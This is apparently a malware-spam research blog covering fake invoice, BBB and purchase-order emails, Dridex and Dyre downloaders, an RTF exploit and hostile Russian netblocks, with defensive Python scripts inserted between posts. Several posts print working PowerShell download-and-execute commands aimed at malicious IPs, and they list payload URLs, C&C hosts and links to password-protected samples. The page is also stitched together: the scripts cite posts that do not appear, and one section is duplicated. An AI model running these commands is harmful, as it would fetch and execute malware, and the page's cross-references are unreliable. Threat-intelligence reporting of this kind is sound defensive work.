Received-SPF: pass ([redacted]: domain of sales@unicorehealth.net designates 63.134.229.186 as permitted sender) client-ip=63.134.229.186 envelope-from=sales@unicorehealth.net helo=mail.unicorehealth.net
X-BlackCat-Spam-Score: -10
X-Mythic-Debug: Threshold = On =
X-Spam-Status: No, score=-1.1
We can see that the SPF record for unicorehealth.net matches it to 63.134.229.186. The domain unicorehealth.net is also hosted on the same IP, so we can be reasonably assured that this is not a forgery. Let's look at the WHOIS details for that domain..
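The header check done by hand above can be scripted. The following is an added example, not code from the original post: it unfolds the header block, takes the connecting IP and HELO name from the topmost Received header (the only one added by a server we control), and compares them with what the Received-SPF header reports, plus whether the From: domain aligns with the envelope sender. The header text is the one quoted above with the recipient redacted; the real SPF evaluation (DNS lookups) is left to the MTA, so this only checks that the recorded values agree with each other. Function names are my own.

```python
import re
from email.utils import parseaddr
from typing import Dict, List, Optional, Tuple

# Header block quoted in the post above (recipient details already redacted there);
# continuation lines are indented, as in a raw message.
HEADERS = """\
Received: from [63.134.229.186] (port=1355 helo=mail.unicorehealth.net)
    by [redacted] with esmtp (Exim 4.80)
    (envelope-from <sales@unicorehealth.net>)
    id 1YLZ9H-0001CT-C2
    for mstanley@redacted; Wed, 11 Feb 2015 15:24:20 +0000
Received: from 31617334.unicorehealth.net
    by mail.unicorehealth.net (Right Sender 3.3) with ASMTP id YRJ55117
    for <mstanley@redacted>; Wed, 11 Feb 2015 10:24:17 -0500
Message-ID: <20150211102412.2e7c8b6c6f@6e5d>
From: "Brad Smith" <sales@unicorehealth.net>
To: "Morgan Stanley" <mstanley@redacted>
Subject: Morgan, HR related question
Received-SPF: pass ([redacted]: domain of sales@unicorehealth.net designates 63.134.229.186 as permitted sender) client-ip=63.134.229.186 envelope-from=sales@unicorehealth.net helo=mail.unicorehealth.net
"""


def unfold(raw: str) -> List[Tuple[str, str]]:
    """Unfold RFC 5322 headers: a line starting with whitespace continues the previous one."""
    headers: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t" and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return headers


def get(headers: List[Tuple[str, str]], name: str) -> List[str]:
    return [v for n, v in headers if n.lower() == name.lower()]


IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"helo=([\w.-]+)", re.IGNORECASE)


def last_hop(headers: List[Tuple[str, str]]) -> Optional[Dict[str, Optional[str]]]:
    """The topmost Received header was written by our own MX, so only its
    connecting IP and HELO name are trustworthy; anything below can be forged."""
    received = get(headers, "Received")
    if not received:
        return None
    ip = IP_RE.search(received[0])
    helo = HELO_RE.search(received[0])
    return {"ip": ip.group(1) if ip else None, "helo": helo.group(1) if helo else None}


def spf(headers: List[Tuple[str, str]]) -> Optional[Dict[str, str]]:
    """Parse the Received-SPF header our MX added: result word plus key=value fields."""
    values = get(headers, "Received-SPF")
    if not values:
        return None
    fields = dict(re.findall(r"(client-ip|envelope-from|helo)=([^\s;]+)", values[0]))
    return {"result": values[0].split()[0].lower(), **fields}


def assess(raw: str) -> Dict[str, object]:
    headers = unfold(raw)
    hop = last_hop(headers) or {}
    s = spf(headers) or {}
    from_hdr = get(headers, "From")
    from_domain = parseaddr(from_hdr[0])[1].rpartition("@")[2].lower() if from_hdr else ""
    env_domain = s.get("envelope-from", "").rpartition("@")[2].lower()
    return {
        "connecting_ip": hop.get("ip"),
        "spf_result": s.get("result"),
        # an SPF result only means something if it was computed for the IP that connected
        "spf_ip_matches_hop": bool(s.get("client-ip")) and s.get("client-ip") == hop.get("ip"),
        "helo_matches": bool(s.get("helo")) and s.get("helo") == hop.get("helo"),
        # From: domain versus envelope sender domain (the alignment DMARC looks at)
        "from_aligned_with_envelope": bool(from_domain) and from_domain == env_domain,
    }


if __name__ == "__main__":
    for key, value in assess(HEADERS).items():
        print(f"{key}: {value}")
```

On the headers above every check comes back true, which is the basis for the "not a forgery" conclusion: the IP our MX saw connecting is the one SPF authorised, the HELO name matches, and the visible From: domain is the same as the bounce address domain.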
Registrant Name: Brad Smith
Registrant Organization: Unicore Health
Registrant Street: 3200 Downwood Circle
Registrant Street: Suite 410
Registrant City: Atlanta
Registrant State/Province: Georgia
Registrant Postal Code: 30327
Registrant Country: United States
Registrant Phone: +1.6785226363
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: bsmith@unicorehealth.com
This links unicorehealth.net with unicorehealth.com. Indeed, we can find "Bradley Smith" on the unicorehealth.com web site.
I emailed Mr Smith back twice and asked him how he came across the email address. He didn't bother to reply.
Previously I mentioned that I have seen this type of spam before from one particular company, BizSummits, run by Michael Price. In particular, they look for potential names on a website and then spam them, a technique that is highly inaccurate but does seem to be relatively successful nonetheless.
Now, Unicore Health is not BizSummits. But they both use a virtual office address in Atlanta, about ten miles apart. So perhaps there is some personal connection between the two businesses or the people behind them.
One of Mr Price's other businesses is called PlugMeIn (plugmein.com), which claims to reveal the email addresses of key people on certain websites. If this uses the same approach as the BizSummits spam, then it might well be just as inaccurate. And perhaps Unicore Health is using PlugMeIn technology to find email addresses.
But since Brad Smith didn't bother to reply to me, I can't tell if this spam was the result of faulty software, a bad email address list or just plain stupidity. Personally, I won't be buying anything from them soon.
UPDATE - January 2017
For various reasons, I ended up revisiting this post and discovered that unicorehealth.net now displays a site "Hartford HR Summit" which is definitely a BizSummits / Michael Price site.
Labels:
BizSummits,
Spam,
Stupidity
Friday 13 February 2015
Something evil on 95.163.121.0/24 (Digital Network JSC / com4tel.ru / cloudavt.com)
I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirety of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU
admin-c: PPP9992-RIPE
tech-c: PPP9992-RIPE
status: ASSIGNED PA
mnt-by: DN-MNT
changed: ncc@msm.ru 20150213
source: RIPE
person: Andrey Tkachenko
address: 107589, Russia Moscow street Khabarovsk 4A
e-mail: cc-it@com4tel.ru
phone: +7 916 626 7798
fax-no: +7 916 626 7798
nic-hdl: PPP9992-RIPE
abuse-mailbox: info@cloudavt.com
mnt-by: DN-MNT
changed: noc@msm.ru 20140429
source: RIPE
route: 95.163.64.0/18
descr: Digital Network JSC
descr: Moscow, Russia
descr: http://www.msm.ru
descr: aggregate prefix
origin: AS12695
mnt-by: DN-MNT
changed: noc@msm.ru 20121129
source: RIPE
Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]
That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.
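One way to make the "high concentration" argument above repeatable is to bucket every IP you have recorded as malicious by its enclosing /24 and see which blocks pass a threshold. The script below is an added example, not from the original post: it uses Python's ipaddress module on a constructed list made up of the five IPs listed above, 95.163.121.179 from the T.A.G. invoice post earlier on this page, and a few unrelated IPs from other posts as controls. The threshold of three and the function names are my own choices.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Dict, Iterable, List

# Constructed working set: the five IPs listed in this post, 95.163.121.179 from the
# T.A.G. invoice post on this page, and unrelated IPs from other posts as controls.
BAD_IPS = [
    "95.163.121.71", "95.163.121.72", "95.163.121.188",
    "95.163.121.216", "95.163.121.217", "95.163.121.179",
    "37.139.47.105", "78.140.164.160", "109.234.38.70", "85.143.166.72",
]


def concentration(ips: Iterable[str], prefixlen: int = 24) -> Dict[str, int]:
    """Count distinct bad hosts per enclosing /prefixlen network."""
    buckets = defaultdict(set)
    for ip in ips:
        addr = ip_address(ip)
        # strict=False lets us pass a host address and get its containing network
        net = ip_network(f"{addr}/{prefixlen}", strict=False)
        buckets[str(net)].add(addr)
    return {net: len(hosts) for net, hosts in buckets.items()}


def blocks_to_recommend(ips: Iterable[str], prefixlen: int = 24, threshold: int = 3) -> List[str]:
    """Networks with at least `threshold` distinct bad hosts: candidates to block wholesale."""
    counts = concentration(ips, prefixlen)
    return sorted(net for net, n in counts.items() if n >= threshold)


def covered_by(ips: Iterable[str], cidr: str) -> List[str]:
    """Which of the known-bad IPs a proposed block actually catches, in address order."""
    net = ip_network(cidr)
    return [str(a) for a in sorted(a for a in map(ip_address, ips) if a in net)]


if __name__ == "__main__":
    for net, n in sorted(concentration(BAD_IPS).items(), key=lambda kv: -kv[1]):
        print(f"{net:<20} {n} bad host(s)")
    print("recommend blocking:", blocks_to_recommend(BAD_IPS))
    print("caught by 95.163.121.0/24:", covered_by(BAD_IPS, "95.163.121.0/24"))
```

With this data the only block that clears the threshold is 95.163.121.0/24, with six distinct bad hosts; the other addresses are lone hits in their /24s, which is the usual argument for blocking a host rather than its whole range.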
Labels:
DINETHOSTING,
Evil Network,
Russia
Malware spam: "Alison Longworth [ALongworth@usluk.com]" / "PURCHASE ORDER (34663)"
From: Alison Longworth [ALongworth@usluk.com]
Date: 13/02/2015 10:57
Subject: PURCHASE ORDER (34663)
Please find attachment below of our Purchase Order No. 34663. Could you
please confirm receipt of this order and also advise when goods will be
available to collect.
NOTE TO ACCOUNTS: Could you please ensure all invoices for goods supplied
are forwarded promptly. Invoices received later than 2 working days after
month end will be dated, processed and paid the following month. To avoid
delays invoices can be sent electronically to accounts@usluk.com
Many Thanks,
Kind Regards,
Alison Longworth
Buyer (Manufacturing)
Universal Sealants (UK) Limited
Kingston House
3 Walton Road
Pattinson North
Washington
Tyne & Wear
NE38 8QA
W: www.usluk.com
E: alison.longworth@usluk.com
T: +44(0)191 416 1530
F: +44(0)191 402 1982
…Complete Solution for Bridge Deck Protection
USL BridgeCare, USL StructureCare, Nufins and Visul Systems are trading
divisions of Universal Sealants (UK) Limited.
Registered Office: Kingston House, 3 Walton Road, Pattinson North,
Washington, Tyne & Wear, NE38 8QA
Company Registration: 01494603
VAT Number: 353 8952 22
This email and any files transmitted with it are strictly confidential. It
is for the intended recipient only. If you have received this email in
error please notify the author by replying to this email. If you are not
the intended recipient, you must not disclose, copy, print or rely on this
email in any way. Any views expressed by an individual within email which
do not constitute or record professional advice relating to the business
of USL BridgeCare, USL StructureCare, Nufins and Visul Systems, do not
necessarily reflect the views of the company.
Important Notice
The information contained in this communication (including any
attachments) is confidential, may be attorney-client privileged, may
constitute inside information, and is intended only for the use of the
addressee. *Any Unauthorized use, disclosure or copying of this
information or any part thereof is strictly prohibited and may be
unlawful. If you have received this communication in error, please notify
us immediately by return e-mail and destroy this communication and all
copies thereof, including all attachments.
Attached is a malicious Word document 2600_001.DOC which actually comes in two different versions with low detection rates [1] [2], containing two slightly different macros [1] [2] which download a component from the following locations:
http://stroygp.ru/js/bin.exe
http://ibw-bautzen.de/js/bin.exe
This is saved as %TEMP%\dsHHH.exe and it has a detection rate of 13/57. Automated analysis tools [1] [2] [3] show the malware POSTing to:
37.139.47.105 (Pirix, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
The malware also drops a DLL with an MD5 of 6693f0093a2d6740149de5d6e950f6c6 (VT 6/57) which is the same Dridex DLL used in this campaign.
Malware spam: "Amazon Marketplace [delivery@amazon.uk]" / "Remittance [Report ID:34355-6014742]"
This email with no body text comes with a malicious Excel attachment:
From: Amazon Marketplace [delivery@amazon.uk]
Date: 13 February 2015 at 14:34
Subject: RE: Remittance [Report ID:34355-6014742]
I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.217/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';
The downloaded file dhoei.exe is exactly the same as used in this spam run.
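The same PowerShell downloader idiom appears in the "Re: Data request" spam above, where the macro stores it ROT13-encoded, and in this Amazon Marketplace macro, where it is in the clear. As an added example that is not part of either post, the Python script below takes the string recovered from such a macro, decodes it from ROT13 when the DownloadFile marker only appears after decoding, and pulls out the download URL, its host and the drop path so the host can go straight onto a blocklist. The two sample strings are constructed: they keep the shape of the commands quoted on this page but use TEST-NET placeholder addresses (192.0.2.10 and 198.51.100.7) instead of the real ones, and the function names are my own.

```python
import codecs
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# The downloader idiom seen in these macros once any encoding is stripped:
#   (New-Object System.Net.WebClient).DownloadFile('<url>','<drop path>')
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<path>[^']+)'\s*\)", re.IGNORECASE
)


def deobfuscate(text: str) -> Tuple[str, bool]:
    """Return (plaintext, was_rot13). Treat the string as ROT13 only when the
    downloader marker is absent before decoding and present after it."""
    if DOWNLOAD_RE.search(text):
        return text, False
    decoded = codecs.decode(text, "rot_13")
    if DOWNLOAD_RE.search(decoded):
        return decoded, True
    return text, False


def extract_iocs(macro_text: str) -> Optional[Dict[str, object]]:
    """URL, host and drop path from one recovered macro string, or None if no downloader."""
    plain, was_rot13 = deobfuscate(macro_text)
    m = DOWNLOAD_RE.search(plain)
    if not m:
        return None
    url = m.group("url")
    return {
        "url": url,
        "host": urlparse(url).hostname,
        "drop_path": m.group("path"),
        "rot13": was_rot13,
    }


def blocklist(samples: List[str]) -> List[str]:
    """Hosts to block, de-duplicated, from a batch of recovered macro strings."""
    hosts = {ioc["host"] for ioc in map(extract_iocs, samples) if ioc and ioc["host"]}
    return sorted(hosts)


# Constructed samples: the page's command shape with TEST-NET placeholder addresses.
PLAIN = ("cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
         "'http://198.51.100.7/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\\oUhjidsf.exe');"
         "Start-Process '%TEMP%\\oUhjidsf.exe';")
# The same shape as stored in the "Data request" macros, i.e. ROT13-encoded.
ENCODED = codecs.encode(
    "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
    "'http://192.0.2.10/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\\JIOiodfhioIH.exe');"
    "Start-Process '%TEMP%\\JIOiodfhioIH.exe';", "rot_13")
SAMPLES = [ENCODED, PLAIN]


if __name__ == "__main__":
    for s in SAMPLES:
        print(extract_iocs(s))
    print("blocklist:", blocklist(SAMPLES))
```

Because ROT13 leaves digits and punctuation alone, the encoded form still looks like a URL with an IP in it; the marker test is what distinguishes "already plain" from "needs decoding", and it also means a string that contains no downloader at all comes back as None rather than as garbage.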
Malware spam: "Remittance XX12345678"
This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
From: Gale Barlow
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP
There is a malicious Word document attached to the email; so far I have only seen one version of this, but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macro which downloads a file from the following location:
http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identified as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempted traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159
Thursday 12 February 2015
Questionable network: 5.135.127.64/27 / userlogin.me
While researching this spam I came across a questionable OVH reseller using the 5.135.127.64/27 range, allocated to userlogin.me.
organisation: ORG-WC13-RIPE
org-name: userlogin
org-type: OTHER
address:
e-mail: support@userlogin.me
abuse-mailbox: abuse@userlogin.me
descr: Userlogin account solutions
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ovh.net 20140521
source: RIPE
A look at passive DNS records shows a variety of sites including stressers, phishing pages, spammers, some malware, plus some other sites which are probably less evil. A lot of these sites are hiding behind Cloudflare; some other sites have moved on to other hosts.
I checked the current IPs and reputations of all the domains that I can find associated with the domain and put them here [csv]. Don't assume they are all evil, but some of those sites are.. interesting.
Labels:
OVH
"invoice :reminder" spam leads to CVE-2012-0158 exploit
This spam has a malicious attachment:
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@valueline.in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that it is malicious, with a detection rate of 6/57. Those detections indicate that this is exploiting CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble.
The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex.net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57 and the Malwr report for this indicates that among other things it installs a keylogger, confirmed by the ThreatExpert report.
The domain directxex.net [Google Safebrowsing] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you block traffic to directxex.net.
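A cheap check that would have flagged this attachment on the mail gateway is comparing a file's extension with its leading bytes: Word opens an RTF file renamed to .doc without complaint, but an RTF body always starts with {\rtf, whereas a genuine Office 97-2003 .doc or .xls is an OLE2 compound file with a fixed eight-byte signature, and the OOXML formats (.docx, .xlsm and friends) are ZIP archives. The following is an added example, not from the original post; the samples are constructed stand-ins (a few signature bytes, not real attachments), and the verdict labels and function names are my own.

```python
import os
from typing import Dict, List, Tuple

# File signatures (magic bytes) for the container formats that matter in these spam runs.
SIGNATURES: List[Tuple[bytes, str]] = [
    (b"{\\rtf", "rtf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),   # Office 97-2003 compound file (.doc/.xls)
    (b"PK\x03\x04", "zip"),                           # OOXML (.docx/.docm/.xlsx/.xlsm) is a ZIP
    (b"%PDF", "pdf"),
    (b"MZ", "pe"),                                    # Windows executable
]

# Container type a file with this extension should have.
EXPECTED: Dict[str, set] = {
    ".doc": {"ole2"}, ".xls": {"ole2"},
    ".docx": {"zip"}, ".docm": {"zip"}, ".xlsx": {"zip"}, ".xlsm": {"zip"},
    ".rtf": {"rtf"}, ".pdf": {"pdf"}, ".exe": {"pe"},
}


def sniff(data: bytes) -> str:
    """Container type from the leading bytes, or 'unknown'."""
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def check_attachment(filename: str, data: bytes) -> Dict[str, str]:
    """Compare what the extension promises with what the bytes are."""
    ext = os.path.splitext(filename)[1].lower()
    kind = sniff(data)
    expected = EXPECTED.get(ext)
    if expected is None:
        verdict = "unknown-extension"
    elif kind in expected:
        verdict = "ok"
    else:
        verdict = "mismatch"   # e.g. RTF or PE bytes under a .doc/.pdf name
    return {"name": filename, "ext": ext, "detected": kind, "verdict": verdict}


# Constructed samples: just enough bytes to carry each signature.
SAMPLES: Dict[str, bytes] = {
    "INVOICE.doc": b"{\\rtf1\\ansi\\deff0 Hello}",                  # RTF posing as .doc
    "66990.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24,  # real OLE2 container
    "15E376774.xlsm": b"PK\x03\x04" + b"\x00" * 26,                    # OOXML (ZIP) container
    "report.pdf": b"MZ\x90\x00" + b"\x00" * 60,                        # executable posing as PDF
}


def triage(samples: Dict[str, bytes]) -> Dict[str, str]:
    """Verdict per attachment name."""
    return {name: check_attachment(name, data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(check_attachment(name, data))
```

A mismatch is not proof of malice (people do rename files), but in a mail stream the combination "claims to be .doc, is actually RTF or a PE" is rare enough to quarantine for a look, and it costs eight bytes of reading per attachment. Note that a macro-carrying 66990.doc sails through this check: it really is an OLE2 file, so the content check is a complement to, not a substitute for, macro and sandbox analysis.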
Malware spam: "BBB Accreditation Services [no-replay@newyork.bbb.org]" / "BBB SBQ Form"
This fake BBB email has a malicious attachment.
From: BBB Accreditation Services [no-replay@newyork.bbb.org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57. Automated analysis tools [1] [2] [3] [4] show that it attempts to connect to the following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211
time.microsoft.akadns.net
checkip.dyndns.org
Of these, checkip.dyndns.org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun.com on 95.173.170.227 (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http://semiyun.com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be blocked.
A file jeoQxZ5.exe is also dropped with a detection rate of 6/57. This is most likely the Dyre banking trojan. Samples can be found here, password is infected.
Malware spam: "Minuteman Press West Loop" / "westloop@minutemanpress.com" / "INVOICE 1398 - FEB 4 2015"
This fake invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email forgery.
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
From: Minuteman Press West Loop [westloop@minutemanpress.com]
Reply-To: westloop@minutemanpress.com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |
I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57 and contains this malicious macro which downloads a second component from:
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
Wednesday 11 February 2015
Malware spam: "Gail Walker [gail@mblseminars.com]" / "Outstanding Invoice 271741"
This fake invoice does NOT come from MBL Seminars; they are not sending this spam, nor have their systems been compromised. Instead, this is a forgery with a malicious attachment.
From: Gail Walker [gail@mblseminars.com]
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited
The Mill House
6 Worsley Road
Worsley
Manchester
United Kingdom
M28 2NL
Tel: +44 (0)161 793 0984
Fax: +44 (0)161 728 8139
So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each [1] [2]. These download a component from the following locations:
http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe
This file is saved as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)
The Malwr report suggests an attempt to connect to these nonexistent domains:
U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com
It also drops a DLL with a detection rate of 3/57 which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70
For researchers, a copy of the files can be found here. Password is infected.
UPDATE 2015-02-12
Another spam run is under way, with the same text but two different DOC files with zero detections [1] [2] containing one of two malicious macros [1] [2] that download another component from one of the following locations:
http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe
The payload appears to be the same as the one used in this spam run.
Malware spam: "Your latest e-invoice from.."
This fake invoice spam has a malicious attachment:
From: Lydia Oneal
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
The company name and the name of the sender vary, but most of the body text remains identical. Some sample subjects are:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
The macro is calling Powershell to download and execute code from these locations:
http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzner, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)
